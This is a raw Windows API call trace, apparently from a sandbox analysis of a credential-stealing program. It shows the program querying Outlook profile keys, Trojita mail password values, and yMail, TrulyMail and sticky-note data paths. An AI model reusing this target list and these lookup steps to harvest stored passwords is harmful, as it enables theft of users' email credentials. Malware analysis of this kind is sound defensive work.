[0116.443] RegCloseKey (hKey=0x1f0) returned 0x0 [0116.443] GetProcessHeap () returned 0x5b0000 [0116.443] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca920 | out: hHeap=0x5b0000) returned 1 [0116.443] GetProcessHeap () returned 0x5b0000 [0116.443] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.444] RegCloseKey (hKey=0x1fc) returned 0x0 [0116.444] GetProcessHeap () returned 0x5b0000 [0116.444] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca930 | out: hHeap=0x5b0000) returned 1 [0116.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.445] SHEnumKeyExW (in: hkey=0x204, dwIndex=0xc, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="f35c115766b7c94cb080da6869ae8f9d", pcchName=0xdfb7c) returned 0x0 [0116.445] GetProcessHeap () returned 0x5b0000 [0116.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa70 [0116.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.447] RegOpenKeyW (in: hKey=0x204, lpSubKey="f35c115766b7c94cb080da6869ae8f9d", phkResult=0x5caa70 | out: phkResult=0x5caa70*=0x1fc) returned 0x0 [0116.447] GetProcessHeap () returned 0x5b0000 [0116.447] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.448] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0116.448] GetProcessHeap () returned 0x5b0000 [0116.448] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.448] GetProcessHeap () returned 0x5b0000 [0116.448] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.449] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.450] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d") returned 88 [0116.450] GetProcessHeap () returned 0x5b0000 [0116.450] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0116.450] GetProcessHeap () returned 0x5b0000 [0116.451] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.451] GetProcessHeap () returned 0x5b0000 [0116.451] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0116.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.452] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x5ca8d0 | out: phkResult=0x5ca8d0*=0x1f0) returned 0x0 [0116.452] GetProcessHeap () returned 0x5b0000 [0116.452] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.453] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0116.453] GetProcessHeap () returned 0x5b0000 [0116.453] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.456] RegCloseKey (hKey=0x1f0) returned 0x0 [0116.456] GetProcessHeap () returned 0x5b0000 [0116.456] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0116.456] GetProcessHeap () returned 0x5b0000 [0116.457] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.458] RegCloseKey (hKey=0x1fc) returned 0x0 [0116.458] GetProcessHeap () returned 0x5b0000 [0116.458] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa70 | out: hHeap=0x5b0000) returned 1 [0116.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.459] SHEnumKeyExW (in: hkey=0x204, dwIndex=0xd, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="f86ed2903a4a11cfb57e524153480001", pcchName=0xdfb7c) returned 0x0 [0116.459] GetProcessHeap () returned 0x5b0000 [0116.459] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0116.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.460] RegOpenKeyW (in: hKey=0x204, lpSubKey="f86ed2903a4a11cfb57e524153480001", phkResult=0x5caa00 | out: phkResult=0x5caa00*=0x1fc) returned 0x0 [0116.460] GetProcessHeap () returned 0x5b0000 [0116.460] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.460] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0116.461] GetProcessHeap () returned 0x5b0000 [0116.461] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.461] GetProcessHeap () returned 0x5b0000 [0116.461] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.461] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.462] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0116.462] GetProcessHeap () returned 0x5b0000 [0116.462] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0116.462] GetProcessHeap () returned 0x5b0000 [0116.462] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.462] GetProcessHeap () returned 0x5b0000 [0116.462] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8f0 [0116.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.463] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x5ca8f0 | out: phkResult=0x5ca8f0*=0x1f0) returned 0x0 [0116.464] GetProcessHeap () returned 0x5b0000 [0116.464] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.464] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0116.464] GetProcessHeap () returned 0x5b0000 [0116.465] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.466] RegCloseKey (hKey=0x1f0) returned 0x0 [0116.466] GetProcessHeap () returned 0x5b0000 [0116.466] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8f0 | out: hHeap=0x5b0000) returned 1 [0116.466] GetProcessHeap () returned 0x5b0000 [0116.466] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.468] RegCloseKey (hKey=0x1fc) returned 0x0 [0116.468] GetProcessHeap () returned 0x5b0000 [0116.468] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0116.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.475] SHEnumKeyExW (in: hkey=0x204, dwIndex=0xe, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="", pcchName=0xdfb7c) returned 0x103 [0116.475] GetProcessHeap () returned 0x5b0000 [0116.476] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd20 | out: hHeap=0x5b0000) returned 1 [0116.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.477] RegCloseKey (hKey=0x204) returned 0x0 [0116.477] GetProcessHeap () returned 0x5b0000 [0116.477] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9e0 | out: hHeap=0x5b0000) returned 1 [0116.477] GetProcessHeap () returned 0x5b0000 [0116.477] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0116.477] GetProcessHeap () returned 0x5b0000 [0116.478] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0116.478] GetProcessHeap () returned 0x5b0000 [0116.478] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.478] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.479] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.479] GetProcessHeap () returned 0x5b0000 [0116.479] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5ccd70 [0116.479] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.480] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\yMail2\\POP3.xml", arglist=0xdfae8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 47 [0116.480] GetProcessHeap () returned 0x5b0000 [0116.480] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x62) returned 0x5cc9f0 [0116.480] GetProcessHeap () returned 0x5b0000 [0116.481] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.482] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 0 [0116.482] GetProcessHeap () returned 0x5b0000 [0116.483] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.483] GetProcessHeap () returned 0x5b0000 [0116.483] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.483] GetProcessHeap () returned 0x5b0000 [0116.483] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.487] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.488] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.488] GetProcessHeap () returned 0x5b0000 [0116.488] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5ccd70 [0116.488] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.489] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\yMail2\\SMTP.xml", arglist=0xdfadc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 47 [0116.489] GetProcessHeap () returned 0x5b0000 [0116.489] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x62) returned 0x5cc9f0 [0116.489] GetProcessHeap () returned 0x5b0000 [0116.490] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.491] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 0 [0116.491] GetProcessHeap () returned 0x5b0000 [0116.492] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.492] GetProcessHeap () returned 0x5b0000 [0116.492] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.492] GetProcessHeap () returned 0x5b0000 [0116.492] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.493] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.493] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.493] GetProcessHeap () returned 0x5b0000 [0116.493] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6c) returned 0x5ccd70 [0116.494] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.494] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\yMail2\\Accounts.xml", arglist=0xdfad0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 51 [0116.495] GetProcessHeap () returned 0x5b0000 [0116.495] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6a) returned 0x5cc9f0 [0116.495] GetProcessHeap () returned 0x5b0000 [0116.495] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.496] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 0 [0116.496] GetProcessHeap () returned 0x5b0000 [0116.497] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.497] GetProcessHeap () returned 0x5b0000 [0116.497] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.497] GetProcessHeap () returned 0x5b0000 [0116.497] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.498] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.498] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.498] GetProcessHeap () returned 0x5b0000 [0116.498] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5ccd70 [0116.499] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.500] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\yMail\\ymail.ini", arglist=0xdfac4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 47 [0116.500] GetProcessHeap () returned 0x5b0000 [0116.500] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x62) returned 0x5cc9f0 [0116.500] GetProcessHeap () returned 0x5b0000 [0116.501] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.504] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 0 [0116.504] GetProcessHeap () returned 0x5b0000 [0116.505] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.505] GetProcessHeap () returned 0x5b0000 [0116.505] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.505] GetProcessHeap () returned 0x5b0000 [0116.505] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0116.505] GetProcessHeap () returned 0x5b0000 [0116.505] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0116.505] GetProcessHeap () returned 0x5b0000 [0116.505] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cbd20 [0116.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.506] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="imap.auth.pass", pdwType=0x0, pvData=0x5cbd20, pcbData=0xdfa1c*=0x104 | out: pdwType=0x0, pvData=0x5cbd20, pcbData=0xdfa1c*=0x104) returned 0x2 [0116.506] GetProcessHeap () returned 0x5b0000 [0116.506] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd20 | out: hHeap=0x5b0000) returned 1 [0116.506] GetProcessHeap () returned 0x5b0000 [0116.506] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cbd20 [0116.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.507] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="msa.smtp.auth.pass", pdwType=0x0, pvData=0x5cbd20, pcbData=0xdfa1c*=0x104 | out: pdwType=0x0, pvData=0x5cbd20, pcbData=0xdfa1c*=0x104) returned 0x2 [0116.507] GetProcessHeap () returned 0x5b0000 [0116.507] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd20 | out: hHeap=0x5b0000) returned 1 [0116.507] GetProcessHeap () returned 0x5b0000 [0116.508] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0116.508] GetProcessHeap () returned 0x5b0000 [0116.508] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0116.508] GetProcessHeap () returned 0x5b0000 [0116.508] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8c) returned 0x5ccd70 [0116.508] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.509] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\TrulyMail\\Data\\Settings\\user.config", arglist=0xdfb40 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 73 [0116.509] GetProcessHeap () returned 0x5b0000 [0116.509] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x96) returned 0x5c9390 [0116.509] GetProcessHeap () returned 0x5b0000 [0116.510] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.511] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 0 [0116.511] GetProcessHeap () returned 0x5b0000 [0116.511] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.511] GetProcessHeap () returned 0x5b0000 [0116.511] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x12c) returned 0x5c9390 [0116.511] GetProcessHeap () returned 0x5b0000 [0116.511] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0116.511] GetProcessHeap () returned 0x5b0000 [0116.511] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.512] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.512] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.513] Sleep (dwMilliseconds=0xa) [0116.533] GetProcessHeap () returned 0x5b0000 [0116.533] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.533] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.534] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdf8fc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn") returned 37 [0116.534] GetProcessHeap () returned 0x5b0000 [0116.534] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4e) returned 0x5c94c8 [0116.534] GetProcessHeap () returned 0x5b0000 [0116.535] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.535] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.spn"), lpFindFileData=0xdf910 | out: lpFindFileData=0xdf910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x5b7670, ftLastWriteTime.dwHighDateTime=0x5b7670, nFileSizeHigh=0x5bb890, nFileSizeLow=0x5bbc10, dwReserved0=0x0, dwReserved1=0xdf96c, cFileName="ը眠", cAlternateFileName="뒭蕬͈읩만ィﭴ\r䂑@")) returned 0xffffffff [0116.536] GetProcessHeap () returned 0x5b0000 [0116.536] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c94c8 | out: hHeap=0x5b0000) returned 1 [0116.536] GetProcessHeap () returned 0x5b0000 [0116.537] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.537] GetProcessHeap () returned 0x5b0000 [0116.537] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.538] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.538] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0116.539] Sleep (dwMilliseconds=0xa) [0116.627] GetProcessHeap () returned 0x5b0000 [0116.627] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.628] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.628] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdf8e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn") returned 35 [0116.628] GetProcessHeap () returned 0x5b0000 [0116.629] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4a) returned 0x5c94c8 [0116.629] GetProcessHeap () returned 0x5b0000 [0116.629] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.629] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.spn"), lpFindFileData=0xdf8f8 | out: lpFindFileData=0xdf8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x5b7670, ftLastWriteTime.dwHighDateTime=0x5b7670, nFileSizeHigh=0x5bb890, nFileSizeLow=0x5bbe98, dwReserved0=0x0, dwReserved1=0xdf954, cFileName="ը眠", cAlternateFileName="⦰螚䇆맔ィﭜ\r䂑@")) returned 0xffffffff [0116.630] GetProcessHeap () returned 0x5b0000 [0116.630] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c94c8 | out: hHeap=0x5b0000) returned 1 [0116.630] GetProcessHeap () returned 0x5b0000 [0116.630] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.630] GetProcessHeap () returned 0x5b0000 [0116.631] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.631] GetProcessHeap () returned 0x5b0000 [0116.631] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0116.631] GetProcessHeap () returned 0x5b0000 [0116.631] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f74) returned 0x5ccd70 [0116.631] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.632] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\To-Do DeskList\\tasks.db", arglist=0xdfb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 61 [0116.632] GetProcessHeap () returned 0x5b0000 [0116.632] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5c9390 [0116.632] GetProcessHeap () returned 0x5b0000 [0116.633] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.634] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 0 [0116.634] GetProcessHeap () returned 0x5b0000 [0116.634] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.634] GetProcessHeap () returned 0x5b0000 [0116.634] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x12c) returned 0x5c9390 [0116.634] GetProcessHeap () returned 0x5b0000 [0116.635] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0116.635] GetProcessHeap () returned 0x5b0000 [0116.635] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.635] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.636] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0116.636] GetProcessHeap () returned 0x5b0000 [0116.636] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5ccd70 [0116.636] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.637] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\stickies\\images", arglist=0xdfb24 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 53 [0116.637] GetProcessHeap () returned 0x5b0000 [0116.637] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6e) returned 0x5c94c8 [0116.637] GetProcessHeap () returned 0x5b0000 [0116.638] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.638] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 0 [0116.639] GetProcessHeap () 